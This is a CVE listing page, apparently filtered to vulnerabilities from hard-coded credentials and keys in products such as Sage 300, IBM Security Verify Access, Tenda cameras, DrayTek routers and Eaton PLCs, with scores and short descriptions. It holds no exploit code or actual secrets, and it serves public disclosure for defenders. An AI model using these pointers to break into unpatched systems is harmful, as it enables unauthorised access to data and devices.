Total
1481 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2022-41399 | 1 Sage | 1 Sage 300 | 2025-01-31 | N/A | 7.5 HIGH |
| The optional Web Screens feature for Sage 300 through version 2022 uses a hard-coded 40-byte blowfish key ("PASS_KEY") to encrypt and decrypt the database connection string for the PORTAL database found in the "dbconfig.xml". This issue could allow attackers to obtain access to the SQL database. | |||||
| CVE-2022-41398 | 1 Sage | 1 Sage 300 | 2025-01-31 | N/A | 7.5 HIGH |
| The optional Global Search feature for Sage 300 through version 2022 uses a set of hard-coded credentials for the accompanying Apache Solr instance. This issue could allow attackers to login to the Solr dashboard with admin privileges and access sensitive information. | |||||
| CVE-2023-27921 | 1 Jins | 2 Jins Meme, Jins Meme Firmware | 2025-01-31 | N/A | 6.5 MEDIUM |
| JINS MEME CORE Firmware version 2.2.0 and earlier uses a hard-coded cryptographic key, which may lead to data acquired by a sensor of the affected product being decrypted by a network-adjacent attacker. | |||||
| CVE-2022-41400 | 1 Sage | 1 Sage 300 | 2025-01-30 | N/A | 9.8 CRITICAL |
| Sage 300 through 2022 uses a hard-coded 40-byte blowfish key to encrypt and decrypt user passwords and SQL connection strings stored in ISAM database files in the shared data directory. This issue could allow attackers to decrypt user passwords and SQL connection strings. | |||||
| CVE-2023-26089 | 1 Echa.europa | 1 Iuclid | 2025-01-30 | N/A | 9.8 CRITICAL |
| European Chemicals Agency IUCLID 6.x before 6.27.6 allows authentication bypass because a weak hard-coded secret is used for JWT signing. The affected versions are 5.15.0 through 6.27.5. | |||||
| CVE-2024-49806 | 1 Ibm | 1 Security Verify Access | 2025-01-29 | N/A | 9.4 CRITICAL |
| IBM Security Verify Access Appliance 10.0.0 through 10.0.8 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. | |||||
| CVE-2024-49805 | 1 Ibm | 1 Security Verify Access | 2025-01-29 | N/A | 9.4 CRITICAL |
| IBM Security Verify Access Appliance 10.0.0 through 10.0.8 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. | |||||
| CVE-2024-31873 | 1 Ibm | 1 Security Verify Access | 2025-01-28 | N/A | 7.5 HIGH |
| IBM Security Verify Access Appliance 10.0.0 through 10.0.7 contains hard-coded credentials which it uses for its own inbound authentication that could be obtained by a malicious actor. IBM X-Force ID: 287317. | |||||
| CVE-2023-30354 | 1 Tenda | 2 Cp3, Cp3 Firmware | 2025-01-27 | N/A | 9.8 CRITICAL |
| Shenzen Tenda Technology IP Camera CP3 V11.10.00.2211041355 does not defend against physical access to U-Boot via the UART: the Wi-Fi password is shown, and the hardcoded boot password can be inserted for console access. | |||||
| CVE-2023-30352 | 1 Tenda | 2 Cp3, Cp3 Firmware | 2025-01-27 | N/A | 9.8 CRITICAL |
| Shenzen Tenda Technology IP Camera CP3 V11.10.00.2211041355 was discovered to contain a hard-coded default password for the RTSP feed. | |||||
| CVE-2023-30351 | 1 Tenda | 2 Cp3, Cp3 Firmware | 2025-01-27 | N/A | 7.5 HIGH |
| Shenzen Tenda Technology IP Camera CP3 V11.10.00.2211041355 was discovered to contain a hard-coded default password for root which is stored using weak encryption. This vulnerability allows attackers to connect to the TELNET service (or UART) by using the exposed credentials. | |||||
| CVE-2024-46505 | 2025-01-23 | N/A | 9.1 CRITICAL | ||
| Infoblox BloxOne v2.4 was discovered to contain a business logic flaw due to thick client vulnerabilities. | |||||
| CVE-2023-4539 | 1 Comarch | 1 Erp Xl | 2025-01-23 | N/A | 7.5 HIGH |
| Use of a hard-coded password for a special database account created during Comarch ERP XL installation allows an attacker to retrieve embedded sensitive data stored in the database. The password is same among all Comarch ERP XL installations. This issue affects ERP XL: from 2020.2.2 through 2023.2. | |||||
| CVE-2023-6255 | 1 Utarit | 1 Solipay Mobile | 2025-01-23 | N/A | 7.5 HIGH |
| Use of Hard-coded Credentials vulnerability in Utarit Information Technologies SoliPay Mobile App allows Read Sensitive Strings Within an Executable.This issue affects SoliPay Mobile App: before 5.0.8. | |||||
| CVE-2024-49060 | 1 Microsoft | 1 Azure Stack Hci | 2025-01-23 | N/A | 8.8 HIGH |
| Azure Stack HCI Elevation of Privilege Vulnerability | |||||
| CVE-2024-45832 | 2025-01-17 | N/A | 4.3 MEDIUM | ||
| Hard-coded credentials were included as part of the application binary. These credentials served as part of the application authentication flow and communication with the mobile application. An attacker could access unauthorized information. | |||||
| CVE-2024-57811 | 2025-01-16 | N/A | 9.1 CRITICAL | ||
| In Eaton X303 3.5.16 - X303 3.5.17 Build 712, an attacker with network access to a XC-303 PLC can login as root over SSH. The root password is hardcoded in the firmware. NOTE: This vulnerability appears in versions that are no longer supported by Eaton. | |||||
| CVE-2023-28937 | 1 Saison | 1 Dataspider Servista | 2025-01-09 | N/A | 8.8 HIGH |
| DataSpider Servista version 4.4 and earlier uses a hard-coded cryptographic key. DataSpider Servista is data integration software. ScriptRunner and ScriptRunner for Amazon SQS are used to start the configured processes on DataSpider Servista. The cryptographic key is embedded in ScriptRunner and ScriptRunner for Amazon SQS, which is common to all users. If an attacker who can gain access to a target DataSpider Servista instance and obtain a Launch Settings file of ScriptRunner and/or ScriptRunner for Amazon SQS, the attacker may perform operations with the user privilege encrypted in the file. Note that DataSpider Servista and some of the OEM products are affected by this vulnerability. For the details of affected products and versions, refer to the information listed in [References]. | |||||
| CVE-2023-33778 | 1 Draytek | 143 Myvigor, Vigor1000b, Vigor1000b Firmware and 140 more | 2025-01-09 | N/A | 9.8 CRITICAL |
| Draytek Vigor Routers firmware versions below 3.9.6/4.2.4, Access Points firmware versions below v1.4.0, Switches firmware versions below 2.6.7, and Myvigor firmware versions below 2.3.2 were discovered to use hardcoded encryption keys which allows attackers to bind any affected device to their own account. Attackers are then able to create WCF and DrayDDNS licenses and synchronize them from the website. | |||||
| CVE-2024-29063 | 1 Microsoft | 1 Azure Ai Search | 2025-01-09 | N/A | 7.3 HIGH |
| Azure AI Search Information Disclosure Vulnerability | |||||